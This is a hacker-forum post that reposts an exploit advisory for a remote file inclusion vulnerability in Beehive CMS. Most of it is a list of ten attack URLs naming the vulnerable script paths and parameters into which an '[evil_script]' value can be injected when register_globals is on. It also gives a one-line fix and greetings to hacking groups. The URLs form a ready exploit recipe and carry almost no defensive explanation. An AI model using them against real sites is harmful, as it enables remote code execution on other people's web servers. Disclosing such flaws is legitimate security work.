Jump to content
Guest Nemessis

[RST] Beehive CMS ([header]) RFI

Recommended Posts

Guest Nemessis
Posted

http://www.milw0rm.com/exploits/1951

---------------------------------------------------------------------------

Beehive CMS ([header]) Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Beehive CMS

version : latest version

URL : http://products.magnet-i.com/show/beehive/

------------------------------------------------------------------

Exploit:

~~~~~~~~

Variable $header not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/conad/include/rootGui.inc.php?header=[evil_script]

# http://www.site.com/[path]/conad/changeEmail.inc.php?mysqlCall=[evil_script]

# http://www.site.com/[path]/conad/changeUserDetails.inc.php?mysqlCall=[evil_script]

# http://www.site.com/[path]/conad/checkPasswd.inc.php?mysqlCall=[evil_script]

# http://www.site.com/[path]/conad/login.inc.php?mysqlCall=[evil_script]

# http://www.site.com/[path]/conad/logout.inc.php?mysqlCall=[evil_script]

# http://www.site.com/[path]/include/listall.inc.php?mysqlcall=[evil_script]

# http://www.site.com/[path]/show/index.php?prefix=[evil_script]

# http://www.site.com/[path]/conad/include/mysqlCall.inc.php?config=[evil_script]

# http://www.site.com/[path]/include/rootGui.inc.php?header=[evil_script]

---------------------------------------------------------------------------

Solution :

~~~~~~~~~~

declare variabel $header

---------------------------------------------------------------------------

Shoutz:

~~~~~~

# Special greetz to my good friend [Oo]

# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://rstcenter.com ]

---------------------------------------------------------------------------

*/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...